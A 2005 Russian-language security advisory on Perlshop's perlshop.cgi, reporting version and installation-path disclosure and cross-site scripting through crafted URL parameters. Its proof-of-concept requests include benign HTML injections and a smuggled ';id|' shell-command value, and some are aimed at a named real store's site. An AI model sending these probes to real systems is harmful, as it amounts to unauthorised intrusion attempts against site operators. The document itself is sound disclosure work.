|
Здравствуйте, 3APA3A.
Вот обнаружил несколько проблем в скипте perlshop.cgi version 4.4.01
и более ранних.
Software: Perlshop < 4.5.01
Vendor: Waverider Systems www.WaveriderSystems.com
Vulnerability: раскрытие инсталяционного пути и межсайтовый
скриптинг
Risk: низкий
Date: 19.12.2005
discovered by durito -durito[at]mail[dot]ru-
HTTP: www.lwb57.org
durito.narod.ru
+~~~:| Details |:
Раскрытие версии скрипта:
http://www.xxx.com/cgi-bin/store/perlshop.cgi/*
Раскрытие инсталяционного пути:
http://www.xxx.com/cgi-bin/store/perlshop.cgi?action=ENTER&thispage=1&OR
DER_ID=!ORDERID!
вставляем любой символ в параметр thispage.
Альтернативное раскрытие инсталяционного пути:
http://www.xxx.com/cgi-bin/store/perlshop.cgi?action=ENTER&thispage=durito.h
tml&ORDER_ID=!ORDERID!
В параметре thispage запрашиваем любой несуществующий файл,
например durito.html и смотрим исходный код страницы:
<h3 align="center">The page (/home/studios/public_html/catalog/1.html) you have requested is not available.</h3>
Межсайтовый скриптинг:
http://www.xxx.com/cgi-bin/store/perlshop.cgi?action=<h1>Hello</h1>
http://www.xxx.com/cgi-bin/store/perlshop.cgi?ORDER_ID=<h1>Hello</h1>
Так же межсайтовый скриптинг возможен в системе поиска Perlshop.
Примеры:
http://www.hollywoodcostumesandparty.com/cgi-bin/store/perlshop.cgi/*
http://hollywoodcostumesandparty.com/cgi-bin/store/perlshop.cgi?action=ENTER&
thispage=1&ORDER_ID=!ORDERID!
http://hollywoodcostumesandparty.com/cgi-bin/store/perlshop.cgi?action=ENTER&
thispage=1.html&ORDER_ID=!ORDERID!
http://www.hollywoodcostumesandparty.com/cgi-bin/store/perlshop.cgi?ORDER_ID=%
3Ch1%3EHello%3C/h1%3E
http://hollywoodcostumesandparty.com/cgi-bin/store/perlshop.cgi?action=%3Ch1
%3EHello%3C/h1%3E&thispage=;id|&ORDER_ID=!ORDERID!
--
С уважением,
durito [LwB Security Team] mailto:durito@mail.ru
http://durito.narod.ru
|
